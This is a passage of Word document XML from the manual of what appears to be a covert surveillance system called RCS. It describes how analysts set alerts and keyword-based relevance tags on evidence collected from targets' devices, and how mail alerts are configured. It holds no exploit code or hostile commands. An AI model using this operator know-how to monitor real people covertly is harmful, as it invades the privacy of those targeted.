        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5543550" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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43550" cy="1609725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83C5D" w:rsidRPr="003B0583" w:rsidRDefault="00B83C5D" w:rsidP="00B83C5D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B83C5D" w:rsidRDefault="00117549" w:rsidP="00B83C5D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.3</w:t>
      </w:r>
      <w:r w:rsidR="00B83C5D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B83C5D" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B83C5D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web browser</w:t>
      </w:r>
      <w:r w:rsidR="00B83C5D" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:r w:rsidR="00B83C5D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCS Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00722BC3" w:rsidRDefault="00722BC3">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRPr="000918A3" w:rsidRDefault="003571D2" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc372642526"/>
      <w:r w:rsidRPr="000918A3">
        <w:lastRenderedPageBreak/>
        <w:t>Alerting Events, Types and Auto-Tagging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRDefault="003571D2" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRPr="00A56FC9" w:rsidRDefault="00533BDE" w:rsidP="00533BDE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Alerting</w:t>
      </w:r>
      <w:r w:rsidR="00B23CF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, available for Evidence Analysts within RCS Console, allows to </w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">receive alerts when a certain type of evidence is </w:t>
      </w:r>
      <w:r w:rsidR="00B23CF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>received</w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">target’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>device synchronizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with RCS or when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the I</w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntelligence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> section </w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">automatically creates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntities or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00533BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A56FC9" w:rsidRDefault="00A56FC9" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabell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283"/>
        <w:gridCol w:w="4935"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B23CF6" w:rsidTr="00B86C48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A56FC9">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251884544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="781050" y="3219450"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:align>left</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:align>top</wp:align>
                  </wp:positionV>
                  <wp:extent cx="2689604" cy="2563200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="889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689604" cy="2563200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="00A52C9B" w:rsidRDefault="00117549" w:rsidP="00117549">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.4</w:t>
            </w:r>
            <w:r w:rsidR="00B23CF6" w:rsidRPr="00A56FC9">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00B23CF6">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Alerting</w:t>
            </w:r>
            <w:r w:rsidR="00B23CF6" w:rsidRPr="00A56FC9">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B23CF6">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt; New Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B23CF6" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4935" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="004954E4" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Alert</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is active or not.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="0085775C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the Operation, Target or Agent to be monitored.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="0085775C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the </w:t>
            </w:r>
            <w:r w:rsidR="00AD121C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>event to be monitored: Evidence, Sync, Instance, Entity or Link.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00057B63">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00AD121C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if [ Event ] = Evidence, it allows to specify the evidence’s type to be monitored.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keyword</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00AD121C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if [ Event ] = Evidence, it allows to specify the</w:t>
            </w:r>
            <w:r w:rsidR="00B86C48">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> keyword that evidence must contain in order to trigger the alert.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Relevance</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00AD121C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">if [ Event ] = Evidence / Link, it allows to </w:t>
            </w:r>
            <w:r w:rsidR="000C264F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>automatically tag Evidence / Link with the specified level.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00BE1D3C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the type of alert to be created. [ Type ] = None is used for tagging (relevance) only.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B23CF6" w:rsidRPr="006F1279" w:rsidRDefault="00B23CF6" w:rsidP="000C264F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Suppression time</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00AD121C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if [ Event ] = Evidence</w:t>
            </w:r>
            <w:r w:rsidR="000C264F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and [ Type ] = Mail</w:t>
            </w:r>
            <w:r w:rsidR="00AD121C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, it allows to specify the</w:t>
            </w:r>
            <w:r w:rsidR="000C264F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> latency time for sending identical e-mail</w:t>
            </w:r>
            <w:r w:rsidR="00F37794">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> alerts, avoiding identical messages after the first one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B23CF6" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23CF6" w:rsidRDefault="00B23CF6" w:rsidP="00B23CF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A56FC9" w:rsidRPr="00A56FC9" w:rsidRDefault="005F4624" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to use the Mail type alert, a valid SMTP server must be configured first. In order to do that, simply use the </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4624">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rcs-db-config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script available on the Backend server, within </w:t>
      </w:r>
      <w:r w:rsidRPr="00326B35">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\RCS\Db\bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r w:rsidR="00326B35">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00F2314A" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId360"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76B3F" w:rsidRDefault="00A76B3F" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc372642527"/>
      <w:r w:rsidRPr="00DA06EB">
        <w:lastRenderedPageBreak/>
        <w:t>System Maintenance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00121E4B" w:rsidRDefault="00F2314A" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc372642528"/>
      <w:r w:rsidRPr="00121E4B">
        <w:t>Backup: Jobs Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
